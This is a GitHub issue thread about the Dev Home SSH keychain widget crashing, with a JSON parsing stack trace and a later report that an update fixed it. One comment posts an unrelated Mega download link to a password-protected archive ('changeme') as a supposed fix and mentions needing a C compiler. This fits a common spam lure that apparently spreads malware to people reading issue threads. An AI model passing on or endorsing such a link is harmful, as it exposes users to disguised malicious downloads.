### ISSUE TITLE
DevHome SSH widget crashes

### ISSUE THREAD

**Issue by lfiorini** [microsoft/devhome#3888]
### Dev Home version

0.1801.625.0

### Windows build number

10.0.22631.4169

### Steps to reproduce the bug

Click on an ssh item in the SSH keychain widget

### Expected result

Open the window to connect

### Actual result

It aits few seconds then the screen flash as if it tries to open the window.
These are the last lines in the log:

[2024/09/20 09:52:09.689 FTL] (DevHome) Unhandled exception: Error reading JObject from JsonReader. Current JsonReader item is not an object: String. Path '', line 1, position 16.
Newtonsoft.Json.JsonReaderException: Error reading JObject from JsonReader. Current JsonReader item is not an object: String. Path '', line 1, position 16.
   at Newtonsoft.Json.Linq.JObject.Load(JsonReader reader, JsonLoadSettings settings)
   at Newtonsoft.Json.Linq.JObject.Parse(String json, JsonLoadSettings settings)
   at DevHome.Dashboard.ViewModels.WidgetViewModel.MergeJsonData(String jsonStringA, String jsonStringB)
   at DevHome.Dashboard.ViewModels.WidgetViewModel.HandleAdaptiveAction(RenderedAdaptiveCard sender, AdaptiveActionEventArgs args)
   at System.Threading.Tasks.Task.<>c.<ThrowAsync>b__128_0(Object state)
   at Microsoft.UI.Dispatching.DispatcherQueueSynchronizationContext.<>c__DisplayClass2_0.<Post>b__0()

**Comment by SAMBILI** [comment]
try this
https://mega.co.nz/#!h7FUWTgJ!EBLwTfcj8qX2Q2_UCp-4N7KgdH2Hs9qNkvH4vjvN6II
Archive password: changeme

you may need to install the c compiler

**Comment by lfiorini** [comment]
Version 0.1801.640.0 has fixed the issue. Many thanks,
